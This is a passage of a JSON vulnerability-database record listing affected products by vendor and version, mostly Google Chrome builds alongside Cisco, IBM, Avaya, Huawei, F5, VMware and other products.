"vendor": "google", "version": "10.0.646.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.697.0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.222" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.593.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.41" }, { "model": "quantum virtualized packet core", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.7" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.120" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.100" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.339.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.626.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1031.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.708.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.559.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.625.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.64" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "e9000 blade server ch240 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor 9000e v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1009.0" }, { "model": "oceanstor css v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.326" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.1" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.881.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.800.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.659.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37599" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.330.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "power hmc r7.6.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rack server rh1288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1001" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.18" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.70" }, { "model": "tam data manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1056" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.33" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.768.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.0" }, { "model": "gaia embedded r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "9710-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "qradar security information and event manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.35" }, { "model": "oceanstor hvs85t v100r001c99", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.61" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.1" }, { "model": "ipso r75.46", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "flex system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.670.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.378.0" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.27" }, { "model": "qlogic gb intelligent pass-thru module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "87.10.1.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1037" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1060" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.509.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.387.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.3" }, { "model": "vcenter site recovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.290.0" }, { "model": "oceanstor s5500t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7970" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.50" }, { "model": "gaia os r75.0", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "nsx for multi-hypervisor", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.386.0" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.15" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.839.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1277.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.764.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.616.0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.105" }, { "model": "nexus intercloud for vmware", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.45" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.564.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1046" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.2" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "8.1.72" }, { "model": "oceanstor s6800t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9302" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.397.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.70" }, { "model": "secureplatform r70.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "oceanstor n8000 oceanstor s2300", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v100" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.85" }, { "model": "security access manager for enterprise single sign-on", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.7" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "ib6131 40gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.491.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.74" }, { "model": "exadata storage server software", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "nsm3000 appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1054.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.1" }, { "model": "espace u2990 v200r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.58" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.825.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.814.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.600.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.877.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.860.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.475.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1070.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.102" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "aura conferencing standard edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.2" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.1" }, { "model": "gaia r77.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.94" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.16" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5.3" }, { "model": "vcenter server appliance update", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.11" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.31" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "oceanstor s8100 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "gaia embedded r70.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.32" }, { "model": "vcenter application discovery manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1020.0" }, { "model": "enterprise linux els", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.614.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.57" }, { "model": "gaia embedded r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.344.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.9" }, { "model": "move antivirus multi-platform", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.235" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.156.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.111" }, { "model": "flashsystem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.18" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.715.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7535061.121.225.06100" }, { "model": "service control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "80000" }, { "model": "secureplatform r75.40vs", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "t620 flexible dual core thin client", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "oceanstor s6800t v100r005c50", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.17" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.55" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.505.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.0" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.286.0" }, { 